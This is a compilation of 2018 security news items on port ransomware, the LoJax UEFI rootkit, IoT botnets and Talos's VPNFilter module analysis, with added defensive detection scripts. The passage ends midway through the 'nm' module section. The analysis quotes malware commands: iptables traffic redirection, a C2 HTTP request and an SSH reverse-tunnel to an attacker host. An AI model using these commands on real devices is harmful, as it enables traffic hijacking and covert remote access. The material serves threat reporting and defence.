Several computers at the Port of San Diego were infected with ransomware; the incident affected the processing of park permits and public records requests, along with other operations.

According to the officials, the ordinary operations, including ship access and public safety, have not been affected by the cyber attack.

“The Port of San Diego has experienced a serious cybersecurity incident that has disrupted the agency’s information technology systems. The Port first received reports of the disruption on Tuesday, September 25, 2018. The Port has mobilized a team of industry experts and local, regional, state and federal partners to minimize impacts and restore system functionality, with priority placed on public safety-related systems. The Harbor Police Department has alternative systems and procedures in place to minimize impacts to public safety.” said Randa Coniglio, Chief Executive Officer for the Port of San Diego, in a statement published on the site of the port the day after the attack.

“Additionally, we have reported this disruption to the California Office of Emergency Services (Cal OES) and the County of San Diego Office of Emergency Services. Port employees are currently at work but have limited functionality, which may have temporary impacts on service to the public, especially in the areas of park permits, public records requests, and business services. No further information is available at this time; updates will be provided as information is available,” said Port of San Diego CEO Randa Coniglio.

Port of San Diego hack

The port operator promptly reported the incident to the California Office of Emergency Services and the County of San Diego Office of Emergency Services. Federal authorities, including the Department of Homeland Security, launched an investigation into the attack.

In July the China Ocean Shipping Co. Terminal at the Port of Long Beach was hit by a cyber attack, according to COSCO a “local network breakdown” disrupted some systems in the United States.

Clearly, the series of disruptive cyber attacks reported by three ports raises questions about the level of security of this kind of infrastructure.

Port authorities are privileged targets for hackers, and they are often easy to attack.

The fear is that a threat actor is focusing its efforts on ports worldwide.

Pierluigi Paganini

(Security Affairs – Port of San Diego, hacking)

The post Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona appeared first on Security Affairs.

Phorpiex bots target remote access servers to deliver ransomware

Threat actors are brute-forcing their way into enterprise endpoints running server-side remote access applications and attempting to spread the GandCrab ransomware onto other enterprise computers, SecurityScorecard researchers are warning. Their weapon of choice is Phorpiex/Trik, a bot with worm capabilities that allows it to spread to other systems by copying itself to USBs and other removable drives. The campaign This rather unsophisticated piece of malware scans the internet for Remote Desktop Protocol (RDP) and Virtual … More

The post Phorpiex bots target remote access servers to deliver ransomware appeared first on Help Net Security.

Security Affairs: Talos experts published technical details for seven more VPNFilter modules

Experts from Talos continue to monitor the evolution of the VPNFilter malware, which turns out to be more powerful than previously thought.

In May, Cisco Talos, together with other security firms and law enforcement agencies, uncovered a huge botnet dubbed VPNFilter, made up of more than 500,000 compromised routers and network-attached storage (NAS) devices.

The malicious code targets dozens of device models from Linksys, MikroTik, Netgear, TP-Link, QNAP, ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE.

VPNFilter is a multi-stage, modular strain of malware with a wide range of capabilities for both cyber espionage and sabotage purposes.

Researchers believe this nation-state malware was developed by the same authors as the BlackEnergy malware.

On May 8, Talos researchers observed a spike in VPNFilter infection activity, most of it in Ukraine; the majority of the newly compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

According to the experts at Fortinet who analyzed the malware, VPNFilter operates in three stages:

  • Stage 1 implements a persistence mechanism and redundancy; it allows the malware to survive a reboot.
  • Stage 2 handles data exfiltration, command execution, file collection and device management. A self-destruct module is present only in some versions.
  • Stage 3 consists of multiple plugin modules that perform different tasks. At the time, researchers had identified only three of them:
    • A packet sniffer for traffic analysis and potential data exfiltration.
    • Monitoring of Modbus SCADA traffic.
    • Communication with obfuscated addresses via Tor.

VPNFilter malware

A new report published by Talos now includes technical details for seven more VPNFilter modules. The attackers use them to map networks and compromise endpoints connected to infected devices, to obfuscate and encrypt malicious traffic, to exfiltrate data and communicate with the C&C, to scan for new potential victims reachable from an infected device, and to build a distributed network of proxies that may be used in future attacks to hide the source of malicious traffic.

The Talos analysis sheds light on many aspects of the malware, but not on how VPNFilter gains initial access to devices.

It is still unclear whether the threat actors behind the botnet are attempting to reconstitute their access, but Talos researchers believe VPNFilter has been effectively neutralized.

“Based on our telemetry and information from our partners, it appears that VPNFilter has been entirely neutralized since we and our international coalition of partners (law enforcement, intelligence organizations, and the Cyber Threat Alliance) countered the threat earlier this year. Most C2 channels for the malware have been mitigated.” reads the report published by Talos.

“The stage 2 implants were non-persistent, so most have likely been cleared from infected devices. We have seen no signs of the actor attempting to reconnect with devices that may still have the persistent stage 1 with an open listener.”

Experts conclude that the attackers behind VPNFilter are extremely capable and driven by their mission priorities; for this reason, they will continue to improve their arsenal to achieve their objectives.

Pierluigi Paganini

(Security Affairs – VPNFilter, hacking)

The post Talos experts published technical details for seven more VPNFilter modules appeared first on Security Affairs.




Fancy Bear’s VPNfilter malware is back with 7 new modules

By Waqas

Cisco’s Talos researchers have identified that Russia’s VPNfilter is way more dangerous than it is believed to be. The malware, which prompted the FBI to urge people to reboot their internet routers, contains seven additional third-stage modules that have been infecting countless global networking devices since 2016. The infected devices are mainly located in Ukraine as […]

This is a post from HackRead.com Read the original post: Fancy Bear’s VPNfilter malware is back with 7 new modules

Cybersecurity Researchers Spotted First-Ever UEFI Rootkit in the Wild

Cybersecurity researchers at ESET have unveiled what they claim to be the first-ever UEFI rootkit being used in the wild, allowing hackers to implant persistent malware on the targeted computers that could survive a complete hard-drive wipe. Dubbed LoJax, the UEFI rootkit is part of a malware campaign conducted by the infamous Sednit group, also known as APT28, Fancy Bear, Strontium, and

Russian Sednit APT used the first-ever UEFI rootkit in attacks in the wild

Security experts from ESET have spotted the first-ever UEFI rootkit seen in the wild; the code, tracked as LoJax, was used in targeted attacks.

Security researchers from ESET have discovered a new piece of sophisticated malware used by the Russia-linked Sednit group (aka Fancy Bear, APT28, Pawn Storm, Sofacy Group, and STRONTIUM) in targeted attacks aimed at government entities in the Balkans as well as in Central and Eastern Europe.

The malicious code, tracked as LoJax, is considered the first UEFI rootkit used in attacks in the wild.

Security experts have long debated UEFI rootkits: they are very dangerous, hard to detect, and can survive operating system reinstallation and even hard disk replacement, because they live in the firmware rather than on the disk.

“The discovery of the first in-the-wild UEFI rootkit is notable for two reasons.” reads the analysis published by ESET.

“First, it shows that UEFI rootkits are a real threat, and not merely an attractive conference topic.

And second, it serves as a heads-up, especially to all those who might be in the crosshairs of Sednit. This APT group, also known as APT28, STRONTIUM, Sofacy and Fancy Bear, may be even more dangerous than previously thought.”

The Sednit APT group has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide. The group was also involved in the string of attacks that targeted the 2016 US presidential election.

The discovery marks a milestone in the evolution of the group: it represents an escalation in the complexity of its attacks, and the group’s capabilities may be even more dangerous than previously thought.

The LoJax UEFI rootkit borrows a portion of the code of the LoJack anti-theft software.

LoJack for Laptops is security software designed to help recover stolen computers, but in theory the same mechanism could be abused to spy on the legitimate owner of the device.

LoJack can be used to locate a stolen laptop, lock it or wipe its contents, which makes it a valuable tool for enterprises that want additional protection for their assets.

Earlier this year, experts from Arbor Networks (ASERT) discovered several LoJack agents connecting to servers believed to be controlled by the notorious Russia-linked Fancy Bear APT group.

“ASERT recently discovered Lojack agents containing malicious C2s. These hijacked agents pointed to suspected Fancy Bear (a.k.a. APT28, Pawn Storm) domains.” reads the report published by Netscout.

“ASERT has identified five Lojack agents (rpcnetp.exe) pointing to 4 different suspected domains.  Fancy Bear has been tied to three of the domains in the past.”

Five LoJack agents discovered by the experts were pointing to four C&C servers, three of which have been associated with past campaigns conducted by the Fancy Bear APT group.

Like the legitimate LoJack agent it abuses, LoJax exhibits rootkit-like capabilities: it is implemented as a UEFI/BIOS module so that it survives OS reinstallation and hard drive replacement.

“Since this software’s intent is to protect a system from theft, it is important that it resists OS re-installation or hard drive replacement.” continues the report.

“Thus, it is implemented as a UEFI/BIOS module, able to survive such events. This solution comes pre-installed in the firmware of a large number of laptops manufactured by various OEMs, waiting to be activated by their owners.”

The researchers from ESET revealed that the APT group was successful at least once in writing a malicious UEFI module into a system’s SPI flash memory.

The malicious UEFI module drops and executes the malware on disk during the boot process, so reinstalling the OS or replacing the drive does not remove it. The only way to get rid of it is to reflash the UEFI firmware with a clean image.

UEFI rootkit LoJax

Moreover, cleaning a system’s UEFI firmware means re-flashing it, an operation not commonly done and certainly not by the typical user.
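Because the implant lives in SPI flash, the practical check is to dump the firmware and compare its module inventory against a known-good image of the same BIOS version. The script below is an added example written for this page; it is not ESET’s tooling and does not detect LoJax by signature. It walks only the top-level EFI_FIRMWARE_VOLUME_HEADER and EFI_FFS_FILE_HEADER layouts defined in the UEFI PI specification (nested volumes and compressed sections are out of scope; UEFITool handles those), and the sample image, the two GUIDs and the baseline set are constructed for the demo. The dump itself should come from an external SPI programmer: a machine whose firmware is already compromised cannot be trusted to read its own flash honestly.

```python
"""Inventory the FFS files in a UEFI flash dump and diff them against a clean baseline.

Added example for this page (not ESET's tooling). Parses the documented
firmware-volume and FFS file headers only; sample data below is constructed.
"""
import struct
import uuid

FV_SIGNATURE = b"_FVH"
FV_SIG_OFFSET = 40           # ZeroVector(16) + FileSystemGuid(16) + FvLength(8)
FV_HEADERLEN_OFFSET = 48     # after Signature(4) + Attributes(4)
FFS_HEADER_LEN = 24          # Name(16) IntegrityCheck(2) Type(1) Attributes(1) Size(3) State(1)
ERASED_GUID = b"\xff" * 16
FFS2_GUID = uuid.UUID("8c8ce578-8a3d-4f1c-9935-896185c32dd3")   # EFI_FIRMWARE_FILE_SYSTEM2_GUID
FILE_TYPES = {0x01: "RAW", 0x02: "FREEFORM", 0x03: "SECURITY_CORE", 0x04: "PEI_CORE",
              0x05: "DXE_CORE", 0x06: "PEIM", 0x07: "DRIVER", 0x08: "COMBINED_PEIM_DRIVER",
              0x09: "APPLICATION", 0x0B: "FIRMWARE_VOLUME_IMAGE", 0xF0: "PAD"}


def find_volumes(image: bytes):
    """Yield (offset, length) of each firmware volume located by its _FVH signature."""
    pos = image.find(FV_SIGNATURE)
    while pos != -1:
        start = pos - FV_SIG_OFFSET
        if start >= 0:
            fv_len = struct.unpack_from("<Q", image, start + 32)[0]
            if 0 < fv_len <= len(image) - start:
                yield start, fv_len
        pos = image.find(FV_SIGNATURE, pos + 1)


def list_files(image: bytes, fv_off: int, fv_len: int):
    """Yield (guid, type_name) for each FFS file in one volume."""
    hdr_len = struct.unpack_from("<H", image, fv_off + FV_HEADERLEN_OFFSET)[0]
    pos, end = fv_off + hdr_len, fv_off + fv_len
    while pos + FFS_HEADER_LEN <= end:
        name = image[pos:pos + 16]
        if name == ERASED_GUID:           # erased flash: no more files
            break
        ftype = image[pos + 18]
        size = int.from_bytes(image[pos + 20:pos + 23], "little")
        if size < FFS_HEADER_LEN:
            break
        if ftype != 0xF0:                 # pad files carry no code
            yield str(uuid.UUID(bytes_le=name)), FILE_TYPES.get(ftype, "0x%02x" % ftype)
        pos = (pos + size + 7) & ~7       # files are 8-byte aligned


def inventory(image: bytes):
    return sorted({f for off, ln in find_volumes(image) for f in list_files(image, off, ln)})


def unknown_modules(image: bytes, baseline_guids):
    """Files present in the dump whose GUID is not in the clean baseline."""
    return [(g, t) for g, t in inventory(image) if g not in baseline_guids]


# --- constructed sample image (not a real BIOS) ------------------------------
def _ffs_file(guid: uuid.UUID, ftype: int, body: bytes) -> bytes:
    size = FFS_HEADER_LEN + len(body)
    header = (guid.bytes_le + b"\x00\x00" + bytes([ftype, 0x00])
              + size.to_bytes(3, "little") + b"\xf8")
    data = header + body
    return data + b"\xff" * (-len(data) % 8)


def _firmware_volume(files: bytes) -> bytes:
    hdr_len = 72                          # 56 fixed bytes + one block-map entry + terminator
    total = hdr_len + len(files)
    header = (b"\x00" * 16 + FFS2_GUID.bytes_le + struct.pack("<Q", total) + FV_SIGNATURE
              + struct.pack("<IHHHBB", 0, hdr_len, 0, 0, 0, 2)
              + struct.pack("<IIII", 1, total, 0, 0))
    return header + files


VENDOR_DRIVER = uuid.UUID("5a3bb5ad-1d71-4a3f-8f2c-0d4f6e7a8b9c")   # constructed GUID
IMPLANT_DRIVER = uuid.UUID("c0ffee00-dead-4bee-8a11-0123456789ab")  # constructed GUID
SAMPLE_IMAGE = (b"\xff" * 0x100
                + _firmware_volume(_ffs_file(VENDOR_DRIVER, 0x07, b"A" * 40)
                                   + _ffs_file(IMPLANT_DRIVER, 0x07, b"B" * 20))
                + b"\xff" * 0x100)
CLEAN_BASELINE = {str(VENDOR_DRIVER)}   # inventory of a clean dump of the same BIOS version

if __name__ == "__main__":
    for guid, ftype in unknown_modules(SAMPLE_IMAGE, CLEAN_BASELINE):
        print("unexpected %s %s" % (ftype, guid))
```

An unknown GUID is a lead, not a verdict: vendors add and rename modules between BIOS releases, so diff only against a dump of the identical firmware version, and follow up on any extra DXE driver by extracting and inspecting it.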

Experts attributed the attacks to Sednit through analysis of the code and of the command-and-control infrastructure.

“As mentioned above, some of the LoJax small agent C&C servers were used in the past by SedUploader, a first-stage backdoor routinely used by Sednit’s operators. Also, in cases of LoJax compromise, traces of other Sednit tools were never far away.” concludes the report.

“In fact, systems targeted by LoJax usually also showed signs of these three examples of Sednit malware:

  • SedUploader, a first-stage backdoor
  • XAgent, Sednit’s flagship backdoor
  • Xtunnel, a network proxy tool that can relay any kind of network traffic between a C&C server on the Internet and an endpoint computer inside a local network

These facts allow us to attribute LoJax with high confidence to the Sednit group.”

The full list of Indicators of Compromise (IOCs) and samples was shared by ESET on GitHub.

Pierluigi Paganini

(Security Affairs – LoJax, UEFI rootkit)

The post Russian Sednit APT used the first-ever UEFI rootkit in attacks in the wild appeared first on Security Affairs.

LoJax: First-ever UEFI rootkit detected in a cyberattack

ESET researchers have discovered a cyberattack that used a UEFI rootkit to establish a presence on the victims’ computers. Dubbed LoJax, this rootkit was part of a campaign run by the infamous Sednit group against several high-profile targets in Central and Eastern Europe and is the first-ever publicly known attack of this kind. Boot process of a system infected by the UEFI rootkit “Although, in theory we were aware that UEFI rootkits existed, our discovery … More

The post LoJax: First-ever UEFI rootkit detected in a cyberattack appeared first on Help Net Security.

Blog | Avast EN: New Torii Botnet uncovered, more sophisticated than Mirai | Avast

written by Jakub Kroustek, Vladislav Iliushin, Anna Shirokova, Jan Neduchal and Martin Hron

Disclaimer: Analysis of the server content and samples was done on Thursday, September 20th. Follow the Avast Blog for further updates. 

Introduction

2018 has been a year where the Mirai and QBot variants just keep coming. Any script kiddie now can use the Mirai source code, make a few changes, give it a new Japanese-sounding name, and then release it as a new botnet.



Blog | Avast EN

SheIn Data Breach Exposed Personal Details of 6.4 Million Customers to Hackers

After so many private and government organizations suffering data breaches, a US-based fashion retailer now enters the list. Reportedly, the

SheIn Data Breach Exposed Personal Details of 6.4 Million Customers to Hackers on Latest Hacking News.

Hide and Seek (HNS) IoT Botnet targets Android devices with ADB option enabled

The latest samples of the HNS bot were designed to target Android devices that have the ADB wireless debugging feature enabled.

The Hide and Seek (HNS) IoT botnet was first spotted early this year; since its discovery the authors have continuously evolved its code.

The IoT botnet appeared in the threat landscape in January, when it was first discovered on January 10th by malware researchers from Bitdefender. It then disappeared for a few days and reappeared a few weeks later, infecting more than 20,000 devices within days.

The botnet initially spread by infecting unsecured IoT devices, mainly IP cameras. In July, security experts from Fortinet discovered that the Hide ‘N Seek botnet had been improved to target vulnerabilities in home automation systems.

In the same month, experts from Netlab observed the Hide ‘N Seek botnet also targeting cross-platform database solutions. It was also the first IoT malware to implement a persistence mechanism that keeps devices infected across reboots.

The latest samples of the HNS bot were designed to target Android devices that have the wireless debugging feature enabled, instead of exploiting known vulnerabilities.

By default, Android ships with the Android Debug Bridge (ADB) over Wi-Fi option disabled, but some vendors enable it while customizing the operating system and then ship their devices with the feature still turned on.

The authors of the HNS botnet are attempting to compromise new devices by abusing this feature.

“The newly identified samples add functionality by exploiting the Android Debug Bridge (ADB) over Wi-Fi feature in Android devices, which developers normally use for troubleshooting.” reads the analysis published by Bitdefender.

“While it’s traditionally disabled by default, some Android devices are shipped with it enabled, practically exposing users to remote connections via the ADB interface that’s accessible using the TCP port 5555. Any remote connection to the device is performed unauthenticated and allows for shell access, practically enabling attackers to perform any task in administrator mode.”

In February 2018, security researchers at Qihoo 360’s Netlab had already spotted an Android mining botnet that targeted devices with the ADB interface exposed.

The recent improvement of the Hide and Seek botnet allowed its operators to add 40,000 new devices, most of them in Taiwan, Korea, and China.

HnS ADB_exposed_Shodan

Experts pointed out that the HNS bot could infect any device that has ADB over Wi-Fi enabled, including smart TVs and DVRs.

“It’s safe to say that not just Android-running smartphones are affected — smart TVs, DVRs and practically any other device that has ADB over Wi-Fi enabled could be affected too.” concludes Bitdefender.

“Considering the evidence at hand, we speculate the botnet operators are constantly adding new features to “enslave” as many devices as possible, although the true purpose of the botnet remains unknown.”

Pierluigi Paganini

(Security Affairs – HNS botnet, hacking)

The post Hide and Seek (HNS) IoT Botnet targets Android devices with ADB option enabled appeared first on Security Affairs.

VPNFilter III: More Tools for the Swiss Army Knife of Malware


Summary


VPNFilter — a multi-stage, modular framework that has infected hundreds of thousands of network devices across the globe — is now known to possess even greater capabilities. Cisco Talos recently discovered seven additional third-stage VPNFilter modules that add significant functionality to the malware, including an expanded ability to exploit endpoint devices from footholds on compromised network devices. The new functions also include data filtering and multiple encrypted tunneling capabilities to mask command and control (C2) and data exfiltration traffic. And while we believe our work, and the work of our international coalition of partners, has mostly neutralized the threat from VPNFilter, it can still be difficult to detect in the wild if any devices remain unpatched.

Talos has been researching VPNFilter for months. Our initial findings are outlined here, and a description of additional modules used by the framework is here. As part of our continued investigation, we developed a technique to examine a key protocol used by MikroTik networking devices to hunt for possible exploitation methods used by the actor.

As we followed the thread of VPNFilter infections, it became clear that MikroTik network devices were heavily targeted by the threat actor, especially in Ukraine. Since these devices seemed to be critical to the actor's operational goals, this led us to try to understand how they were being exploited. Part of our investigation included the study of the protocol used by MikroTik's Winbox administration utility. In this blog, we'll share how and why we studied this protocol, as well as the decoder tool we developed as a way of helping the security community look into this protocol for potential malicious actor activity.

The sophistication of VPNFilter drives home the point that this is a framework that all individuals and organizations should be tracking. Only an advanced and organized defense can combat these kinds of threats, and at the scale that VPNFilter is at, we cannot afford to overlook these new discoveries.


Expanded VPNFilter capabilities


The discovery of these additional VPNFilter third-stage modules has significantly added to our understanding of what we already knew to be an extremely potent threat. Together, these modules added:
  1. Additional capabilities that could be leveraged to map networks and exploit endpoint systems that are connected to devices compromised by VPNFilter.
  2. Multiple ways for the threat actor to obfuscate and/or encrypt malicious traffic, including communications used for C2 and data exfiltration.
  3. Multiple tools that could be utilized to identify additional victims accessible from the actor's foothold on devices compromised by VPNFilter for both lateral movement within a network, as well as to identify new edge devices in other networks of interest to the actor.
  4. The capacity to build a distributed network of proxies that could be leveraged in future unrelated attacks to provide a means of obfuscating the true source of attack traffic by making it appear as if the attacks originated from devices previously compromised by VPNFilter.

We were able to confirm the existence and capabilities of the malware after reverse-engineering these additional modules. Previously, we had to make analytic assessments on the existence and nature of these capabilities based solely on telemetry analysis, which always leaves room for error.

For example, we had previously noted what appeared to be devices compromised by VPNFilter conducting scans of large IP spaces that seemed focused on identifying other devices vulnerable to the methods of exploitation used by the actor associated with the VPNFilter malware. However, now we can discuss the specific third-stage module used for this activity.

As a result of our continued research, we have furthered our understanding of the full scope of the capabilities associated with VPNFilter after examining these additional third-stage modules.

Additional third-stage modules


As previously described, Talos identified the following seven additional third-stage modules that greatly expanded the capabilities present within VPNFilter.
Each of these modules is described in detail in the following sections.

'htpx' (endpoint exploitation module - executable injection)


'htpx' is a third-stage module for VPNFilter. This module shares similar code with the 'ssler' module previously documented by Talos. The module relies heavily on open-source code that can be traced to the original projects based on strings present within the binary. A good example is 'libiptc.c', which is part of Netfilter.
Comparison of strings between 'htpx' (left) and 'ssler' (right).

The primary function present within the 'htpx' module is responsible for setting up iptables rules to forward network traffic destined for TCP port 80 to a local server running on port 8888. This redirection is accomplished by first loading kernel modules that allow for traffic management. These modules (ip_tables.ko, iptable_filter.ko, and iptable_nat.ko) are loaded with the insmod shell command.

The 'htpx' module then issues the following commands to surreptitiously forward traffic:

iptables -I INPUT -p tcp --dport 8888 -j ACCEPT
iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8888

It also periodically checks to ensure that these rules remain present by issuing similar delete commands then re-adding them. A temp file is also created called /var/run/htpx.pid.

The following HTTP request is then generated:

GET %s HTTP/1.1\r\nHost: 103.6.146.194\r\nAccept: */*\r\nUser-Agent: curl53\r\n\r\n

During our analysis of the 'htpx' module, we were unable to elicit a response from C2 infrastructure, so we were unable to observe additional module operations. During our analysis of the module binary, we identified that the module inspects HTTP communications to identify the presence of Windows executables. When they are encountered, the executable is flagged and added to a table. We assess with moderate confidence that this module could be leveraged by attackers to download a binary payload and allow for on-the-fly patching of Windows executables as they pass through compromised devices.
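The two iptables rules above are the most durable host-side trace of htpx, and they survive in the output of iptables-save. The script below is an added example for this page, not Talos tooling: it parses an iptables-save dump (passed in as text, so it can also run over a dump pulled from a router), flags any NAT PREROUTING REDIRECT of web ports to a local port, notes whether that local port is also explicitly opened on INPUT (the pair htpx installs), and checks for the /var/run/htpx.pid file. The two dumps embedded in it are constructed for the demo, and the path check is injectable so the logic can be tested without root.

```python
"""Hunt for htpx-style transparent HTTP redirection in iptables state.

Added example for this page (not Talos tooling). Reads iptables-save output
as text; the sample dumps below are constructed.
"""
import os
import re

HTPX_PIDFILE = "/var/run/htpx.pid"
RULE_RE = re.compile(r"^-A\s+(?P<chain>\S+)\s+(?P<body>.*)$")
DPORT_RE = re.compile(r"--dport\s+(\d+)")
REDIRECT_RE = re.compile(r"-j\s+REDIRECT\s+--to-ports?\s+(\d+)")  # iptables-save prints --to-ports


def parse_iptables_save(text: str):
    """Yield (table, chain, rule) for every -A line of an iptables-save dump."""
    table = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("*"):
            table = line[1:]
        elif line.startswith("-A "):
            m = RULE_RE.match(line)
            if m:
                yield table, m.group("chain"), m.group("body")


def find_http_redirects(text: str, watched=frozenset({80, 443})):
    """Return [(from_port, to_port, opened_on_input)] for suspicious REDIRECT rules."""
    redirects, accepted = [], set()
    for table, chain, rule in parse_iptables_save(text):
        dport = DPORT_RE.search(rule)
        if not dport:
            continue
        port = int(dport.group(1))
        redir = REDIRECT_RE.search(rule)
        if table == "nat" and chain == "PREROUTING" and redir and port in watched:
            redirects.append((port, int(redir.group(1))))
        elif table == "filter" and chain == "INPUT" and "-j ACCEPT" in rule:
            accepted.add(port)
    return [(src, dst, dst in accepted) for src, dst in redirects]


def htpx_indicators(text: str, path_exists=os.path.exists):
    """Combine the rule check with the module's pid file; path_exists is injectable for tests."""
    findings = ["redirect tcp/%d -> local tcp/%d (INPUT open: %s)" % f
                for f in find_http_redirects(text)]
    if path_exists(HTPX_PIDFILE):
        findings.append("pid file present: " + HTPX_PIDFILE)
    return findings


# Constructed iptables-save output resembling a device on which htpx has run.
SAMPLE_INFECTED = """\
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8888
COMMIT
*filter
:INPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 8888 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
"""

# Constructed clean dump: only SSH is opened, nothing is redirected.
SAMPLE_CLEAN = """\
*filter
:INPUT DROP [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
"""

if __name__ == "__main__":
    import subprocess
    live = subprocess.run(["iptables-save"], capture_output=True, text=True, check=False).stdout
    for finding in htpx_indicators(live):
        print("[!]", finding)
```

Treat a hit as a lead rather than a verdict: captive portals and legitimate transparent proxies use the same REDIRECT construct, so confirm by looking at what is listening on the target port and whether iptable_nat was expected to be loaded on that device at all.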

'ndbr' (multi-functional SSH tool)


The 'ndbr' module is a module with SSH capabilities that also has the ability to port-scan other IPs. This module uses the dropbear SSH server and client and is a modified version of the dbmulti utility version 2017.75. We have identified several modifications to the standard dropbear functionality.

The first modifications are to the dbmulti utility itself. The stock utility can function as an SSH client or SSH server, transfer files with SCP, and generate or convert keys. The functionality is selected either by the program name or by the first parameter passed to the program. The 'ndbr' module has replaced the key generation and conversion functions with a network mapping (i.e., port-scanning) function as well as another function called 'ndbr.'

Like the original "dbmulti" utility, the 'ndbr' module's functionality depends either on the name of the program or the first argument passed to the program. The arguments that the 'ndbr' module accepts are dropbear, dbclient, ssh, scp, ndbr, and nmap. A description of each of these arguments can be found in the following sections.

dropbear


The dropbear command instructs the 'ndbr' module to operate as an SSH server. The original dropbear code uses the default SSH port (TCP/22) to listen for connections. However, the code present within the 'ndbr' module has been modified to use a default port of TCP/63914. Other modifications to the original dropbear code change the way that host keyfiles are handled. The default keyfile path has been changed to /db_key, but the 'ndbr' module does not drop this file. Instead, the buf_readfile dropbear function has been modified to load the proper key from memory when the filename parameter is equal to /db_key.

Instead of using password-based authentication, the dropbear server has been modified to authenticate via a proper public key, which is also embedded in the 'ndbr' executable. A bug in this modified code mishandles connections attempting to use an incorrect public key. These authentication failures cause the ndbr SSH server to become stuck in an infinite loop. There is no indication to the client, however, that the authentication has failed. At this time, we have been unable to identify a correct key that would allow for successful authentication with the ndbr SSH server — neither of the keys embedded in the 'ndbr' module (i.e., /db_key and /cli_key) were correct, and no corresponding keys were found in any other VPNFilter-related binaries.

dbclient (ssh)


If passed the dbclient or ssh parameter, the 'ndbr' module acts as the standard dropbear SSH command-line interface client but with modifications to its default options. As with the default keyfile with dropbear server command, the dbclient/ssh commands have a default identity file: /cli_key. At this time, we do not know what the dbclient (SSH client) is expected to connect to.

nmap


If passed the nmap argument, the 'ndbr' module will perform a port scan of an IP or range of IPs.

The usage is:

Usage %s -ip* <ip-addr: 192.168.0.1/ip-range 192.168.0.0./24> -p* <port: 80/port-range: 25-125> -noping <default yes> -tcp <default syn> -s <source ip> -h/--help (print this help)

ndbr


If passed the ndbr argument, the 'ndbr' module will do one of three operations based on the other parameters it is passed. The SSH commands will make use of the default keys (i.e., /db_key and /cli_key) as described above.

The third parameter must begin with the word "start," or the 'ndbr' module uninstalls itself.

If the ndbr module is executed using the following parameters:

$ ./ndbr_<arch> ndbr <param1> <param2> "start proxy <host> <port>"

The following dropbear SSH command will be executed:

ssh -y -p <port> prx@<host> srv_ping j(<B64 victim host name>)_<victim MAC address> <param2>

This causes the dropbear SSH client to connect to a remote host and issue the "srv_ping" command, which is likely used to register the victim with a C2 server.

If the ndbr module is executed using the following parameters:

$ ./ndbr_<arch> ndbr <param1> <param2> "start -l <port>"

The dropbear SSH server (as described above) is started and begins listening on the port specified:

sshd -p <port>

If the ndbr module is executed with the following parameters:

$ ./ndbr_<arch> ndbr <param1> <param2> "start <user> <host> <port>"

Remote port forwarding is set up by executing the following dropbear command (see above for explanation of the command options):

ssh -N -T -y -p <port> -R :127.0.0.1:63914 <user>@<host>
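Whether ndbr is listening directly (the dropbear server on TCP/63914 or whatever port was passed to "start -l") or being reached through the remote forward above, the listener identifies itself before any authentication. The probe below is an added example for this page, not Talos or VPNFilter code: it reads the RFC 4253 identification string from a port, parses it, and flags dropbear on a non-standard port. It deliberately stops after the banner, which matters here because, as described above, the modified server hangs when a wrong key is offered. Host and port in the usage call are placeholders and the banners used in the demo are constructed.

```python
"""Fingerprint SSH listeners on non-standard ports such as TCP/63914.

Added example for this page (not Talos or VPNFilter code). Reads only the
RFC 4253 identification line and never attempts authentication.
"""
import socket

NDBR_DEFAULT_PORT = 63914


def parse_ssh_ident(line: str) -> dict:
    """Split 'SSH-protoversion-softwareversion SP comments' per RFC 4253."""
    line = line.rstrip("\r\n")
    if not line.startswith("SSH-"):
        raise ValueError("not an SSH identification string")
    proto, _, rest = line[4:].partition("-")
    software, _, comments = rest.partition(" ")
    return {"proto": proto, "software": software, "comments": comments}


def assess(port: int, ident: dict) -> str:
    """Rank the finding; dropbear on a port other than 22 matches the ndbr pattern."""
    sw = ident["software"].lower()
    if sw.startswith("dropbear") and port != 22:
        return "SUSPICIOUS: dropbear on tcp/%d (%s)" % (port, ident["software"])
    return "INFO: %s on tcp/%d" % (ident["software"] or "unknown", port)


def grab_ident(host: str, port: int, timeout: float = 3.0) -> str:
    """Read lines until the server's SSH- line (servers may send other text first)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("r", encoding="ascii", errors="replace", newline="\n")
        for _ in range(20):
            line = f.readline()
            if not line:
                break
            if line.startswith("SSH-"):
                return line
    raise ValueError("no SSH identification received")


def probe(host: str, port: int = NDBR_DEFAULT_PORT) -> str:
    try:
        return assess(port, parse_ssh_ident(grab_ident(host, port)))
    except (OSError, ValueError) as e:
        return "CLOSED/NOT-SSH tcp/%d: %s" % (port, e)


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.1"   # placeholder host
    for port in (22, NDBR_DEFAULT_PORT):
        print(probe(host, port))
```

Dropbear ships legitimately on a great many routers and NAS units, so a hit on port 22 is normal; the signal is dropbear 2017.75 appearing on a high port that the device's own firmware never opens, and the confirmation is the process that owns that socket.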

'nm' (network mapper)


The 'nm' module is used to scan and map the local subnet. It iterates through all interfaces and starts by ARP scanning for all hosts on the subnet associated with each IP assigned to the interface. Once an ARP reply is received, nm will send an ICMP echo request to the discovered host. If an ICMP echo reply is received it will continue mapping by performing a port scan, trying to connect to the following remote TCP ports on the host: 9, 21, 22, 23, 25, 37, 42, 43, 53, 69, 70, 79, 80, 88, 103, 110, 115, 118, 123, 137, 138, 139, 143, 150, 156, 161, 190, 197, 389, 443, 445, 515, 546, 547, 569, 3306, 8080 or 8291.

Next, it uses the MikroTik Network Discovery Protocol (MNDP) to locate any other MikroTik devices on the local network. If a MikroTik device replies to the MNDP ping, nm extracts the MAC address, system identity, version number, platform type, uptime in seconds, RouterOS software ID, RouterBoard model, and interface name from the discovered device.

The nm module looks in /proc/net/arp to get information about the infected device's ARP table, revealing the IP and MAC addresses of neighboring devices. Next, the entire contents of /proc/net/wireless are gathered.

